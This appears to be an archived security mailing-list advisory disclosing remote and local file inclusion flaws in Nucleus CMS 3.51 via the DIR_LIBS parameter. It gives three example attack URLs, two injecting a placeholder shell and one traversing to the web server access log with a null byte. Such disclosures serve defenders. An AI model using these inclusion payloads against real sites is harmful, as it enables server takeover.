[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability



Vulnerability: Nucleus v3.51 ( other or lower version may also be affected)
Vendor: http://nucleuscms.org/
Category: Input Validation Error
Impact: (rfi/lfi) Multiple Vulnerability

Details:

Multiple Vulnerability has been found in Nucleus v3.51 because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

Nucleus v3.51 and prior versions are vulnerable.

P0C:
The following example URIs are available:

Http://127.0.0.1/[path_to_nucleus]/action.php?DIR_LIBS=[inj3ct0r sh3ll]

Http://127.0.0.1/[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS=[inj3ct0r sh3ll]

Http://127.0.0.1/[path_to_nucleus]/nucleus/plugins/skinfiles/index.php?DIR_LIBS=../../../var/log/httpd/access_log%00